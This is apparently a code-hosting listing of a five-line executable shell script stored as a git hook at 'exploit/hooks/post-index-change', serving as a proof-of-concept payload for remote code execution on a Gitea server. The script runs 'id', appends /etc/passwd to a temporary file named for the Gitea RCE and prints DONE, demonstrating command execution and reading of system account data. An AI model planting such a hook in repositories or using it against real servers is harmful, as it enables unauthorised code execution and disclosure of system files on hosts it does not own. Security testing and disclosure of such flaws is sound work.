exploit/hooks/post-index-change

5 lines
80 B
Bash
Executable File

#!/bin/sh
id > /tmp/gitea_rce_$$
cat /etc/passwd >> /tmp/gitea_rce_$$
echo DONE